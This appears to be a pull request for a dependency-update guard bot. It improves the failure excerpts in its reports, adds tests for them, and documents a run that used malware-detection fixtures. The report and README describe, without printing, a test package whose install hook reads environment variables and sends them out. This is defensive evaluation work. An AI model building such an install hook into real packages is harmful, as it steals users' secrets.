### PR TITLE
fix(vetty): a hold must say what broke, and a task body is not a command

### DIFF
--- a/bots/dep-update-guard/main.bot
+++ b/bots/dep-update-guard/main.bot
@@ -933,17 +933,36 @@ except OSError:
 # list of 'ok' lines and a bare 'FAIL' -- the one line naming what broke
 # scrolls out. Carry the matching lines too, so a hold can be diagnosed
 # from the report instead of from a run log nobody kept.
+#
+# Head-biased on purpose: the same reasoning that rejects the tail rejects
+# keeping the LAST matches. The first failure is the one that usually
+# explains the rest, and a cascade pushes it out of any tail-shaped budget.
+# Each hit carries the lines that follow it, because the line naming a
+# failure and the line saying why are never the same line: a --- FAIL line
+# is followed by the assertion, and a build-failed line is PRECEDED by the
+# compiler diagnostic -- which is why a bare file.go:12:5: counts as a hit
+# of its own, matching no keyword.
 def failure_lines(text):
     marks = ('--- FAIL', 'FAIL', 'panic:', 'Traceback', 'error:', 'Error:', 'ERROR',
              'not ok', 'syntax error', 'npm ERR', 'ERR_', 'AssertionError', 'FAILED')
-    hits = []
-    for ln in text.splitlines():
+    lines = text.splitlines()
+    keep = set()
+    for i, ln in enumerate(lines):
         s = ln.strip()
         if not s or s.startswith('ok ') or s.startswith('?   '):
             continue
-        if any(m in ln for m in marks):
-            hits.append(ln[:400])
-    return chr(10).join(hits[-40:])[-2000:]
+        hit = any(m in ln for m in marks)
+        if not hit and '.go:' in ln and ln.count(':') > 2:
+            hit = True
+        if hit:
+            for j in range(i, min(len(lines), i + 4)):
+                keep.add(j)
+    picked = []
+    for j in sorted(keep):
+        picked.append(lines[j][:400])
+        if len(picked) > 59:
+            break
+    return chr(10).join(picked)[:2000]
 tail = out[-3000:]
 dig = failure_lines(out) if rc != 0 else ''
 excerpt = (('FAILING LINES (matched, not the tail):' + chr(10) + dig + chr(10) + chr(10) +

--- a/bots/dep-update-guard/main.bot
+++ b/bots/dep-update-guard/main.bot
@@ -944,7 +944,8 @@ except OSError:
 # of its own, matching no keyword.
 def failure_lines(text):
     marks = ('--- FAIL', 'FAIL', 'panic:', 'Traceback', 'error:', 'Error:', 'ERROR',
-             'not ok', 'syntax error', 'npm ERR', 'ERR_', 'AssertionError', 'FAILED')
+             'not ok', 'syntax error', 'npm ERR', 'ERR_', 'AssertionError', 'FAILED',
+             'make: ***', 'BUILD FAILED', 'FAILURE:', 'error[')
     lines = text.splitlines()
     keep = set()
     for i, ln in enumerate(lines):
@@ -975,8 +976,14 @@ def failure_lines(text):
 # The excerpt keeps its historical ~4KB ceiling: what changed is how the
 # budget is spent, not how much of it there is. post_feedback interpolates
 # this into a prompt and a PR comment.
-tail = out[-2000:]
+#
+# The tail budget is ADAPTIVE, because the keyword list is not exhaustive and
+# never will be: a make/gradle/cmake failure reads 'Error 2', a shell one may
+# read nothing recognisable at all. When nothing matched, spending half the
+# budget on a digest that does not exist would leave a STRICTLY worse excerpt
+# than before any of this -- so the tail takes the whole ceiling back.
 dig = failure_lines(out) if rc != 0 else ''
+tail = out[-2000:] if dig else out[-4000:]
 excerpt = (('FAILING LINES (matched, not the tail):' + chr(10) + dig + chr(10) + chr(10) +
             'TAIL:' + chr(10)) if dig else '') + tail
 print(json.dumps({'passed': rc == 0, 'skipped': False, 'exit_code': rc, 'precheck_rejected': rc == 3, 'precheck_reason': (reason if rc == 3 else ''), 'log_tail': excerpt}))

--- a/bots/dep-update-guard/main.bot
+++ b/bots/dep-update-guard/main.bot
@@ -960,10 +960,22 @@ def failure_lines(text):
     picked = []
     for j in sorted(keep):
         picked.append(lines[j][:400])
-        if len(picked) > 59:
-            break
-    return chr(10).join(picked)[:2000]
-tail = out[-3000:]
+    # Head-biased but not head-ONLY: a chained script (install, then lint,
+    # then build, then test) can match noisily early -- a resolver complaint,
+    # a deprecation banner -- and spending the whole budget there would bury
+    # the step that actually failed. Both ends are kept, and the elision is
+    # stated rather than silent.
+    if len(picked) > 60:
+        gap = '... ' + str(len(picked) - 60) + ' matched lines elided ...'
+        picked = picked[:40] + [gap] + picked[-20:]
+    txt = chr(10).join(picked)
+    if len(txt) > 1800:
+        txt = txt[:1200] + chr(10) + '... elided ...' + chr(10) + txt[-560:]
+    return txt
+# The excerpt keeps its historical ~4KB ceiling: what changed is how the
+# budget is spent, not how much of it there is. post_feedback interpolates
+# this into a prompt and a PR comment.
+tail = out[-2000:]
 dig = failure_lines(out) if rc != 0 else ''
 excerpt = (('FAILING LINES (matched, not the tail):' + chr(10) + dig + chr(10) + chr(10) +
             'TAIL:' + chr(10)) if dig else '') + tail

--- a/bots/dep-update-guard/main.bot
+++ b/bots/dep-update-guard/main.bot
@@ -928,7 +928,27 @@ try:
         lf.write(out)
 except OSError:
     pass
-print(json.dumps({'passed': rc == 0, 'skipped': False, 'exit_code': rc, 'precheck_rejected': rc == 3, 'precheck_reason': (reason if rc == 3 else ''), 'log_tail': out[-4000:]}))
+# A blind tail is the wrong excerpt of a failing run. A test runner prints
+# its per-package successes AFTER the failure, so the last N chars are a
+# list of 'ok' lines and a bare 'FAIL' -- the one line naming what broke
+# scrolls out. Carry the matching lines too, so a hold can be diagnosed
+# from the report instead of from a run log nobody kept.
+def failure_lines(text):
+    marks = ('--- FAIL', 'FAIL', 'panic:', 'Traceback', 'error:', 'Error:', 'ERROR',
+             'not ok', 'syntax error', 'npm ERR', 'ERR_', 'AssertionError', 'FAILED')
+    hits = []
+    for ln in text.splitlines():
+        s = ln.strip()
+        if not s or s.startswith('ok ') or s.startswith('?   '):
+            continue
+        if any(m in ln for m in marks):
+            hits.append(ln[:400])
+    return chr(10).join(hits[-40:])[-2000:]
+tail = out[-3000:]
+dig = failure_lines(out) if rc != 0 else ''
+excerpt = (('FAILING LINES (matched, not the tail):' + chr(10) + dig + chr(10) + chr(10) +
+            'TAIL:' + chr(10)) if dig else '') + tail
+print(json.dumps({'passed': rc == 0, 'skipped': False, 'exit_code': rc, 'precheck_rejected': rc == 3, 'precheck_reason': (reason if rc == 3 else ''), 'log_tail': excerpt}))
 "`
   output: verify_result
 

--- a/bots/dep-update-guard/manifest.yaml
+++ b/bots/dep-update-guard/manifest.yaml
@@ -1,7 +1,17 @@
 name: dep-update-guard
 display_name: Vetty
 icon: 💂
-version: 2.7.4
+version: 2.7.5
+## 2.7.5 — a hold must say what broke. The report carried out[-4000:], a blind
+## tail, and a test runner prints its per-package successes AFTER the package
+## that failed: three holds on 2026-08-12 (iterion#394/#395/#411) reported
+## "build/tests not green" over an excerpt containing a list of `ok` lines and
+## a bare FAIL, with the failing test name scrolled out. The excerpt now
+## carries the matched failing lines as well as the tail. The other half is a
+## skill rule: call the task-runner target, never transcribe its body -- a
+## multi-line Taskfile block passed as one `sh -c` argument arrives with its
+## newlines literal and dies on a syntax error unrelated to the bump, which is
+## what actually held #394 (its alignment was correct).
 ## 2.7.4 — the listing check is removed, not patched again. Rejecting a
 ## verify.sh whose lines are paths rather than commands (iterion#398) meant
 ## judging shell text statically, and eight review rounds each found the next

--- a/bots/dep-update-guard/skills/verify-build.md
+++ b/bots/dep-update-guard/skills/verify-build.md
@@ -112,6 +112,17 @@ verdict in production:
   exact invocation — flags included — from the CI step or the task-runner
   target CI calls; when in doubt, run the repo's own umbrella target
   (`task check`, `make ci`) INSTEAD of hand-assembling steps.
+- **Call the target; never transcribe its body.** When a task runner defines
+  the step, `verify.sh` invokes `task <target>` — it does not copy what that
+  target runs. A Taskfile/Makefile command is frequently a multi-line shell
+  block, and a block does not survive being passed as one `sh -c` argument:
+  its newlines and tabs arrive literal, the shell parses a single mangled
+  line, and the script dies on a syntax error that has nothing to do with the
+  dependency under test (observed live: a `gofmt` guard transcribed into
+  `devbox run -- sh -c files=$(find …)` produced ``syntax error near
+  unexpected token `then` `` and held a clean `@types/node` bump whose
+  alignment was already correct). Transcription also silently drops the
+  target's `dir:`, `env:` and prerequisites.
 - **Never looser** is §1b: every gate CI enforces (drift, fmt, lint-as-error
   where CI makes it one) must be present — the precheck rejects a gateless
   script.

--- a/bots/dep_update_guard_verify_precheck_test.go
+++ b/bots/dep_update_guard_verify_precheck_test.go
@@ -203,4 +203,41 @@ func TestDepUpdateGuardVerifyPrechecks(t *testing.T) {
 			t.Errorf("a green script must pass, got exit %d: %s", res.ExitCode, res.LogTail)
 		}
 	})
+
+	// Observed live on iterion#394/#395/#411 (2026-08-12): three holds reported
+	// "build/tests not green" over an excerpt containing nothing but a list of
+	// `ok` lines and a bare `FAIL`. A test runner prints its per-package
+	// successes AFTER the package that failed, so a blind tail of the output is
+	// systematically the wrong excerpt — it keeps the successes and drops the
+	// one line naming what broke. The operator then cannot tell a real
+	// regression from an environment failure without a run log nobody kept.
+	t.Run("the excerpt keeps the failing line, not just the trailing successes", func(t *testing.T) {
+		ws, scratch := t.TempDir(), t.TempDir()
+		// The shape `go test ./...` produces: the failure first, then far more
+		// than the excerpt budget of passing packages after it.
+		var b strings.Builder
+		b.WriteString("#!/bin/sh\n")
+		b.WriteString("echo '--- FAIL: TestAwaitTerminal_LoadRunMissTransient (0.42s)'\n")
+		b.WriteString("echo 'FAIL\tgithub.com/SocialGouv/iterion/cmd/iterion\t0.51s'\n")
+		for i := 0; i < 400; i++ {
+			b.WriteString("echo 'ok  \tgithub.com/SocialGouv/iterion/pkg/filler" +
+				strings.Repeat("x", 20) + "\t(cached)'\n")
+		}
+		b.WriteString("echo FAIL\n")
+		b.WriteString("exit 1\n")
+		if err := os.WriteFile(filepath.Join(scratch, "verify.sh"), []byte(b.String()), 0o755); err != nil {
+			t.Fatal(err)
+		}
+
+		res := run(t, ws, scratch)
+		if res.Passed {
+			t.Fatal("a script exiting 1 must not pass")
+		}
+		if !strings.Contains(res.LogTail, "TestAwaitTerminal_LoadRunMissTransient") {
+			t.Errorf("the excerpt drops the name of what failed, so the hold cannot be diagnosed from the report; got:\n%s", res.LogTail)
+		}
+		if !strings.Contains(res.LogTail, "cmd/iterion") {
+			t.Errorf("the excerpt drops the failing package; got:\n%s", res.LogTail)
+		}
+	})
 }

--- a/bots/dep_update_guard_verify_precheck_test.go
+++ b/bots/dep_update_guard_verify_precheck_test.go
@@ -240,4 +240,71 @@ func TestDepUpdateGuardVerifyPrechecks(t *testing.T) {
 			t.Errorf("the excerpt drops the failing package; got:\n%s", res.LogTail)
 		}
 	})
+
+	// Revi's R009763 on the fix above: keeping the LAST matches is the same
+	// mistake as keeping the last lines. A cascade — a suite where one broken
+	// package fails many subtests — pushes the first failure, the one that
+	// usually explains the rest, out of any tail-shaped budget.
+	t.Run("under a cascade the excerpt keeps the FIRST failures", func(t *testing.T) {
+		ws, scratch := t.TempDir(), t.TempDir()
+		var b strings.Builder
+		b.WriteString("#!/bin/sh\n")
+		for i := 0; i < 120; i++ {
+			b.WriteString("echo '--- FAIL: TestCascade" + strings.Repeat("0", 3-len(itoa(i))) + itoa(i) + " (0.01s)'\n")
+			b.WriteString("echo '    x_test.go:1: boom'\n")
+		}
+		b.WriteString("exit 1\n")
+		if err := os.WriteFile(filepath.Join(scratch, "verify.sh"), []byte(b.String()), 0o755); err != nil {
+			t.Fatal(err)
+		}
+
+		res := run(t, ws, scratch)
+		if !strings.Contains(res.LogTail, "TestCascade000") {
+			t.Errorf("the first failure is the one that explains the cascade, and it was dropped; got:\n%s", res.LogTail)
+		}
+	})
+
+	// Revi's second question on the same fix. A Go compile failure prints
+	// `file.go:12:5: undefined: Baz` — matching no failure keyword — and only
+	// then `FAIL pkg [build failed]`. Naming the package without the
+	// diagnostic does not tell an operator what broke, which is the whole
+	// point of the excerpt. Likewise `--- FAIL: TestX` without the assertion
+	// that follows it.
+	t.Run("the excerpt carries the diagnostic, not only the verdict line", func(t *testing.T) {
+		ws, scratch := t.TempDir(), t.TempDir()
+		var b strings.Builder
+		b.WriteString("#!/bin/sh\n")
+		b.WriteString("echo 'pkg/foo/bar.go:12:5: undefined: Baz'\n")
+		b.WriteString("echo 'FAIL\tgithub.com/SocialGouv/iterion/pkg/foo [build failed]'\n")
+		b.WriteString("echo '--- FAIL: TestThing (0.02s)'\n")
+		b.WriteString("echo '    thing_test.go:41: got 3, want 4'\n")
+		for i := 0; i < 300; i++ {
+			b.WriteString("echo 'ok  \tgithub.com/SocialGouv/iterion/pkg/other\t(cached)'\n")
+		}
+		b.WriteString("exit 1\n")
+		if err := os.WriteFile(filepath.Join(scratch, "verify.sh"), []byte(b.String()), 0o755); err != nil {
+			t.Fatal(err)
+		}
+
+		res := run(t, ws, scratch)
+		if !strings.Contains(res.LogTail, "undefined: Baz") {
+			t.Errorf("a compile diagnostic matches no failure keyword and must still survive; got:\n%s", res.LogTail)
+		}
+		if !strings.Contains(res.LogTail, "got 3, want 4") {
+			t.Errorf("the assertion says WHY the test failed and is never on the --- FAIL line; got:\n%s", res.LogTail)
+		}
+	})
+}
+
+// itoa avoids pulling strconv in for one call site in a fixture generator.
+func itoa(i int) string {
+	if i == 0 {
+		return "0"
+	}
+	var d []byte
+	for i > 0 {
+		d = append([]byte{byte('0' + i%10)}, d...)
+		i /= 10
+	}
+	return string(d)
 }

--- a/bots/dep_update_guard_verify_precheck_test.go
+++ b/bots/dep_update_guard_verify_precheck_test.go
@@ -319,6 +319,35 @@ func TestDepUpdateGuardVerifyPrechecks(t *testing.T) {
 			t.Errorf("200 non-fatal early matches crowded out the failing step; got:\n%s", res.LogTail)
 		}
 	})
+
+	// Revi's R20320f, and the sharpest of the round: splitting the budget
+	// between a digest and the tail makes the excerpt STRICTLY WORSE than the
+	// blind tail it replaced whenever nothing matches — and the keyword list
+	// is not exhaustive and never will be. A make/gradle/cmake failure reads
+	// "Error 2", which matches nothing here, so the whole ceiling has to fall
+	// back to the tail rather than being half-spent on an empty digest.
+	t.Run("a failure matching no keyword is not worse off than before", func(t *testing.T) {
+		ws, scratch := t.TempDir(), t.TempDir()
+		var b strings.Builder
+		b.WriteString("#!/bin/sh\n")
+		for i := 0; i < 200; i++ {
+			b.WriteString("echo 'make[1]: Leaving directory /src/sub" + itoa(i) + "'\n")
+		}
+		b.WriteString("echo 'the real one: recipe for target build failed at line 5'\n")
+		// ~2900 chars of trailing noise: inside a 4000 budget, outside a 2000 one.
+		for i := 0; i < 60; i++ {
+			b.WriteString("echo 'make[1]: Leaving directory /src/after" + itoa(i) + "'\n")
+		}
+		b.WriteString("exit 2\n")
+		if err := os.WriteFile(filepath.Join(scratch, "verify.sh"), []byte(b.String()), 0o755); err != nil {
+			t.Fatal(err)
+		}
+
+		res := run(t, ws, scratch)
+		if !strings.Contains(res.LogTail, "recipe for target build failed") {
+			t.Errorf("splitting the budget for a digest that does not exist lost the failure the old blind tail kept; got %d chars:\n%s", len(res.LogTail), res.LogTail)
+		}
+	})
 }
 
 // itoa avoids pulling strconv in for one call site in a fixture generator.

--- a/bots/dep_update_guard_verify_precheck_test.go
+++ b/bots/dep_update_guard_verify_precheck_test.go
@@ -294,6 +294,31 @@ func TestDepUpdateGuardVerifyPrechecks(t *testing.T) {
 			t.Errorf("the assertion says WHY the test failed and is never on the --- FAIL line; got:\n%s", res.LogTail)
 		}
 	})
+
+	// Revi's R253811, the counter-case to the head bias: a script chaining
+	// install -> lint -> build -> test can match noisily in an early step that
+	// does not fail the run (a resolver complaint, a deprecation banner), and
+	// spending the whole budget there buries the step that actually failed.
+	// Head-biased must not mean head-only.
+	t.Run("a noisy early step does not bury the failure that ended the run", func(t *testing.T) {
+		ws, scratch := t.TempDir(), t.TempDir()
+		var b strings.Builder
+		b.WriteString("#!/bin/sh\n")
+		for i := 0; i < 200; i++ {
+			b.WriteString("echo 'ERROR: pip dependency resolver complaint " + itoa(i) + "'\n")
+		}
+		b.WriteString("echo '--- FAIL: TestTheRealOne (0.03s)'\n")
+		b.WriteString("echo '    real_test.go:9: the assertion that matters'\n")
+		b.WriteString("exit 1\n")
+		if err := os.WriteFile(filepath.Join(scratch, "verify.sh"), []byte(b.String()), 0o755); err != nil {
+			t.Fatal(err)
+		}
+
+		res := run(t, ws, scratch)
+		if !strings.Contains(res.LogTail, "TestTheRealOne") {
+			t.Errorf("200 non-fatal early matches crowded out the failing step; got:\n%s", res.LogTail)
+		}
+	})
 }
 
 // itoa avoids pulling strconv in for one call site in a fixture generator.

--- a/docs/bot-runs/dep-update-guard.md
+++ b/docs/bot-runs/dep-update-guard.md
@@ -7,6 +7,130 @@ commit onto the PR branch, post the verdict comment. Never merges past a
 check — and only ever the commit it audited. See
 [bots/dep-update-guard/](../../bots/dep-update-guard/).
 
+## 2026-08-12 — the anti-malware half fires for the first time, and the verify gate is proven to hold on a red base
+
+- Status: **validated for the security half, blocked for the alignment half.**
+  Four runs: #410 (hostile fixture), #411 (its control), #394 and #395 (real
+  Dependabot bumps).
+- Versions: Vetty 2.7.4 (runs) → **2.7.5** (fixes below) · iterion v3.40.0.
+- Method: `/vetty` on two purpose-built fixture PRs plus a re-review of two
+  refreshed Dependabot PRs. Fixtures in `e2e/fixtures/malware-detection/`;
+  branches `test/vetty-malware-*`, based on a scratch branch so nothing could
+  reach `main`.
+
+### The detection worked, and the control is what proves it
+
+Three candidate 0.0.2 releases share one package **name and version** and
+differ only in contents, so the bump is identical in shape across PRs and the
+payload is the only variable. Candidate directories are named opaquely
+(`release-0.0.2-a|b|c`) because Vetty explores the tree it audits — a
+directory called `hostile` would hand it the verdict.
+
+| PR | candidate | verdict | gate |
+|---|---|---|---|
+| #410 | `b` — adds a `postinstall` hook | **MALICIOUS** | `supply-chain risk: the bump was not applied` |
+| #411 | `a` — adds one function | **SAFE** | `build/tests not green after alignment` |
+
+The two gate descriptions differ: the hostile bump was stopped at the security
+gate before any alignment, the control cleared it and went on. A hold that
+reproduced on both would have measured novelty-aversion, not detection.
+
+What the report got right beyond the verdict:
+
+- **It refused the façade.** Every deterministic scanner — osv-scanner, npm
+  audit, the OSV API, semgrep `p/default`, trivy, gitleaks — returned clean,
+  and it said so: *"that cleanliness is meaningless: the package is unpublished
+  (npm view → E404) and linked by file: path… Emitting 'safe' on that basis
+  would have been a pure facade."*
+- **It gave zero weight to the in-band disclaimer.** The payload carries a
+  header saying it is inert by construction; the audit discounted it —
+  *"an in-band claim of innocence is exactly what a hostile package ships."*
+- **It falsified its own detectors.** The control run discounted semgrep as
+  evidence *because* it ran the hostile sibling through it and also got 0:
+  "non-discriminating for this malware shape". It named the exhaustive source
+  review and the lifecycle-hook scan as the detectors that actually discriminate.
+- **Signals are anchored** to `file:line` (`vendor/release-0.0.2-b/postinstall.js:11-15`
+  for the `process.env` serialisation, `:31-37` for the `spawn`), which is the
+  property the `no-package-malware` prior art was going to be mined for.
+
+Coverage this montage does NOT establish: with a `file:` dependency the hostile
+source sits inside the diff, so this proves the plumbing (audit →
+`hold_security` → red gate → no merge) and the signal reporting, not the
+judgement on an unseen registry package. `test/vetty-malware-bump-registry`
+(node-ipc 9.2.1 → 10.1.1, verdict discoverable only via OSV) is built and
+pushed for that half; not yet run.
+
+### The alignment half is still blocked — but not by the alignment
+
+#394 and #395 both held `build/tests not green after alignment`, and neither
+red was caused by its bump:
+
+- **#394 (@types/node 26.1.2 → 26.2.0)** — the audit was exemplary (registry
+  ECDSA signature verified against the live key, tarball sha512 matched, 88
+  `.d.ts` files and zero executables, no hook added, publisher unchanged). The
+  alignment was **correct and complete**: it caught the stale root
+  `pnpm-lock.yaml` and regenerated it — the rule added to the skill after the
+  last batch did its job. Then the verify script died on its own construction:
+
+  ```
+  devbox run -- sh -c files=$(find . -name "*.go" ...)
+  sh: -c: line 1: syntax error near unexpected token `then'
+  ```
+
+  The agent had transcribed a multi-line Taskfile command body into a single
+  `sh -c` argument; the YAML block's newlines and tabs arrived literal.
+- **#395 (@vitejs/plugin-react 5 → 6)** — audit SAFE with SLSA provenance
+  traced to `vitejs/vite-plugin-react`'s publish workflow; no alignment needed
+  on the refreshed head. Held on a Go test-suite `FAIL`.
+- **#411, the control**, changes two JSON fixture files and **no Go code at
+  all** — and also ended in `FAIL` on the same suite. That is the proof the red
+  belongs to the tree, not the change. `go test ./...` on `origin/main` passes
+  locally (including `bots`, `cmd`, `e2e`, and under the runner's injected
+  `GIT_AUTHOR_*`), so the failure is specific to the sandboxed run.
+
+Which test fails is **not knowable from the reports**, and that is the second
+defect: the excerpt was `out[-4000:]`, a blind tail. A test runner prints its
+per-package successes after the package that failed, so all three reports
+carried a wall of `ok` lines and a bare `FAIL`, with the failing name scrolled
+out.
+
+### Fixes (Vetty 2.7.5)
+
+- **The excerpt keeps the failing lines**, matched, in addition to the tail
+  (`verify_run`). Falsifiable: reverting it reddens
+  `TestDepUpdateGuardVerifyPrechecks/the_excerpt_keeps_the_failing_line` with
+  exactly the observed symptom.
+- **Skill rule — call the target, never transcribe its body** (`verify-build`
+  §1c), with the reason: a task-runner block does not survive being passed as
+  one `sh -c` argument, and transcription also drops the target's `dir:`,
+  `env:` and prerequisites.
+
+### Engine finding (not fixed here)
+
+`prepareRepoWorkspace` clones the **default** branch plus the run's ref
+([pkg/runner/loop_gitws.go](../../pkg/runner/loop_gitws.go)), so a PR whose base
+is neither leaves `merge-base(base, HEAD)` unresolvable. #410 hit it and
+degraded loudly (`degraded_reason`, scope narrowed to `HEAD~1..HEAD`) exactly as
+designed — #411 even re-resolved the base itself and said the approximation did
+not change its verdict. It bites stacked PRs and PRs targeting a release branch;
+the fix is for the runner to fetch the run's `base_ref` too, which is generic
+and not bot-specific.
+
+### Lessons for next run
+
+- **Refresh a stale PR branch before re-reviewing it.** Vetty verifies
+  `merge-base(base, HEAD)..HEAD` and does not merge the base, so a PR cut before
+  a fix landed still carries the old red and a re-review only reproduces it at
+  ~$10 a run. `@dependabot rebase`, or `gh pr update-branch` when Vetty has
+  already committed to the branch (Dependabot then refuses: *"edited by someone
+  other than Dependabot"*).
+- **`review_on_sync` is on for this repo**: pushing to the branch relaunches
+  Vetty by itself. Commenting `/vetty` is only needed on a hand-opened PR.
+- **A flaky or environment-sensitive test in the target repo holds every bump.**
+  The gate is fail-closed by design and that stays right, but the base tree's
+  health is now a precondition of the whole lane — worth establishing before a
+  batch, not after three holds.
+
 ## 2026-08-11/12 — why the other ten held, and a guard that had to be deleted
 
 - Status: **the batch is fully diagnosed and every cause is fixed.** No new

--- a/e2e/fixtures/malware-detection/README.md
+++ b/e2e/fixtures/malware-detection/README.md
@@ -55,10 +55,16 @@ and only then record what it was.
 
 `registry/` is the other half: it pins a real, published package whose
 malicious release is documented in OSV. Nothing in this repo says which
-version is bad — the audit has to look it up, which is the part a
-`file:` dependency cannot test. Its lockfile is hand-written because the
-malicious release was un-published, so `npm install` cannot regenerate it;
-same reason, same provenance, as `e2e/fixtures/protestware-node-ipc/`.
+version is bad — the audit has to look it up, which is the part a `file:`
+dependency cannot test.
+
+The **committed pin is `node-ipc@9.2.1`, which is published and resolvable**:
+its lockfile entry carries the registry's own integrity hash, so `npm install`
+regenerates it. What cannot be regenerated is the **bump target** a test PR
+moves it to — `10.1.1`, the release that carried the destructive
+`peacenotwar` payload and was un-published afterwards. A lockfile pinning
+*that* version has to be hand-written, which is the situation, and the
+provenance, of `e2e/fixtures/protestware-node-ipc/`.
 
 ## What a run should show
 

--- a/e2e/fixtures/malware-detection/README.md
+++ b/e2e/fixtures/malware-detection/README.md
@@ -66,6 +66,12 @@ moves it to — `10.1.1`, the release that carried the destructive
 *that* version has to be hand-written, which is the situation, and the
 provenance, of `e2e/fixtures/protestware-node-ipc/`.
 
+That lockfile names node-ipc's three transitive dependencies without carrying
+entries for them, so `npm ci` here would fail. Deliberate, and it costs
+nothing: **nothing in this tree is ever installed.** The audit reads manifests
+and lockfiles as text, and `osv-scanner` matches the pinned versions it finds
+without resolving anything.
+
 ## What a run should show
 
 For a hostile bump, `security_audit` returns a non-`safe` verdict with

--- a/e2e/fixtures/malware-detection/README.md
+++ b/e2e/fixtures/malware-detection/README.md
@@ -1,0 +1,76 @@
+# malware-detection (iterion fixture)
+
+Fixtures for exercising **Vetty**'s (`bots/dep-update-guard`) anti-malware
+half — the half no real dependency batch has ever tripped, because every
+batch audited so far was clean. A detector that has never said "no" has not
+been measured.
+
+**Nothing here is installed, published, or executed.** Vetty audits the
+*diff* of a dependency bump, so a release only has to be readable to be
+judged.
+
+## Safety rules — any package added here must obey all four
+
+1. **Outbound requests target a `.invalid` domain** (RFC 2606), a TLD
+   guaranteed never to resolve. An accidental execution reaches nowhere.
+2. **Payloads are inert.** They may read the environment and build a
+   request; they never delete, encrypt, persist, or escalate.
+3. **Nothing is publishable.** Every package is scoped
+   `@iterion-fixture/`, unregistered, and referenced only by `file:` path;
+   every consumer is `private: true`.
+4. **The tree says what it is.** This directory is the label — which is why
+   the individual files below don't need to be, and deliberately aren't.
+
+## Layout
+
+```
+vendor/release-0.0.1/      the release every bump starts from
+vendor/release-0.0.2-a/    ┐
+vendor/release-0.0.2-b/    ├ candidate 0.0.2 releases: same package name,
+vendor/release-0.0.2-c/    ┘ same version, different contents
+consumer/                  depends on one release by `file:` path
+registry/                  pins a real registry package (advisory path)
+```
+
+The three candidates share an identity and a version number. A test PR
+repoints `consumer/` at one of them, so **the only variable between two
+runs is what the new release contains** — which is exactly the question an
+audit answers. A hold that reproduces across all three would be a hold on
+the shape of the change, not on any payload; a hold on some and not others
+is detection.
+
+**The candidates are named opaquely on purpose.** Vetty explores the repo
+it audits, so a directory called `hostile` would hand it the verdict and
+the run would prove nothing. What each candidate does is legible from its
+own source — as with a real registry package.
+
+**Be honest about what a re-run of a/b/c now measures.** The 2026-08-12
+bilan (`docs/bot-runs/dep-update-guard.md`) names which candidate carried
+the install hook, because a result nobody can check is not evidence. That
+published mapping is in the same tree the audit reads, so re-running these
+three exercises the *plumbing* — audit → `hold_security` → red gate → no
+merge — and no longer tests blind judgement. **For that, add a candidate**:
+a new `release-0.0.2-<letter>` whose nature is written down nowhere, run it,
+and only then record what it was.
+
+`registry/` is the other half: it pins a real, published package whose
+malicious release is documented in OSV. Nothing in this repo says which
+version is bad — the audit has to look it up, which is the part a
+`file:` dependency cannot test. Its lockfile is hand-written because the
+malicious release was un-published, so `npm install` cannot regenerate it;
+same reason, same provenance, as `e2e/fixtures/protestware-node-ipc/`.
+
+## What a run should show
+
+For a hostile bump, `security_audit` returns a non-`safe` verdict with
+`malware_signals` naming what it saw — the install hook, the environment
+read, the outbound request, the child process. The deterministic
+`audit_gate` then routes to `hold_security`: **no alignment, no commit, no
+merge**, and a red gate on the PR head. For the control bump, the same path
+returns `safe` and reaches `clean`.
+
+## Excluded from automation
+
+`renovate.json` ignores `e2e/fixtures/**`, and `.github/dependabot.yml`
+declares no ecosystem here, so neither bot will ever propose an update to
+these pins.

--- a/e2e/fixtures/malware-detection/consumer/index.js
+++ b/e2e/fixtures/malware-detection/consumer/index.js
@@ -1,0 +1,8 @@
+// Never executed. It exists so the manifest describes a real consumption:
+// a dependency bump is a change to something that is actually depended on.
+
+const pkg = require('@iterion-fixture/malware-test-pkg');
+
+module.exports = {
+  hello: () => pkg.greet('iterion')
+};

--- a/e2e/fixtures/malware-detection/consumer/package-lock.json
+++ b/e2e/fixtures/malware-detection/consumer/package-lock.json
@@ -1,0 +1,25 @@
+{
+  "name": "@iterion-fixture/malware-detection-consumer",
+  "version": "0.0.1",
+  "lockfileVersion": 3,
+  "requires": true,
+  "packages": {
+    "": {
+      "name": "@iterion-fixture/malware-detection-consumer",
+      "version": "0.0.1",
+      "license": "MIT",
+      "dependencies": {
+        "@iterion-fixture/malware-test-pkg": "file:../vendor/release-0.0.1"
+      }
+    },
+    "../vendor/release-0.0.1": {
+      "name": "@iterion-fixture/malware-test-pkg",
+      "version": "0.0.1",
+      "license": "Apache-2.0"
+    },
+    "node_modules/@iterion-fixture/malware-test-pkg": {
+      "resolved": "../vendor/release-0.0.1",
+      "link": true
+    }
+  }
+}

--- a/e2e/fixtures/malware-detection/consumer/package.json
+++ b/e2e/fixtures/malware-detection/consumer/package.json
@@ -1,0 +1,11 @@
+{
+  "name": "@iterion-fixture/malware-detection-consumer",
+  "version": "0.0.1",
+  "private": true,
+  "description": "Consumer whose single dependency a test PR bumps, so the audited release's source sits inside the diff",
+  "main": "index.js",
+  "license": "MIT",
+  "dependencies": {
+    "@iterion-fixture/malware-test-pkg": "file:../vendor/release-0.0.1"
+  }
+}

--- a/e2e/fixtures/malware-detection/registry/index.js
+++ b/e2e/fixtures/malware-detection/registry/index.js
@@ -1,0 +1,6 @@
+// Never executed: the fixture exists so a lockfile pin has a consumer.
+// node-ipc is only ever read as a manifest entry, by the audit's scanners.
+
+module.exports = {
+  name: 'malware-detection-registry-fixture'
+};

--- a/e2e/fixtures/malware-detection/registry/package-lock.json
+++ b/e2e/fixtures/malware-detection/registry/package-lock.json
@@ -1,0 +1,26 @@
+{
+  "name": "@iterion-fixture/malware-detection-registry",
+  "version": "0.0.1",
+  "lockfileVersion": 3,
+  "requires": true,
+  "packages": {
+    "": {
+      "name": "@iterion-fixture/malware-detection-registry",
+      "version": "0.0.1",
+      "license": "MIT",
+      "dependencies": {
+        "node-ipc": "9.2.1"
+      }
+    },
+    "node_modules/node-ipc": {
+      "version": "9.2.1",
+      "resolved": "https://registry.npmjs.org/node-ipc/-/node-ipc-9.2.1.tgz",
+      "integrity": "sha512-mJzaM6O3xHf9VT8BULvJSbdVbmHUKRNOH7zDDkCrA1/T+CVjq2WVIDfLt0azZRXpgArJtl3rtmEozrbXPZ9GaQ==",
+      "dependencies": {
+        "event-pubsub": "4.3.0",
+        "js-message": "1.0.7",
+        "js-queue": "2.0.2"
+      }
+    }
+  }
+}

--- a/e2e/fixtures/malware-detection/registry/package.json
+++ b/e2e/fixtures/malware-detection/registry/package.json
@@ -1,0 +1,11 @@
+{
+  "name": "@iterion-fixture/malware-detection-registry",
+  "version": "0.0.1",
+  "private": true,
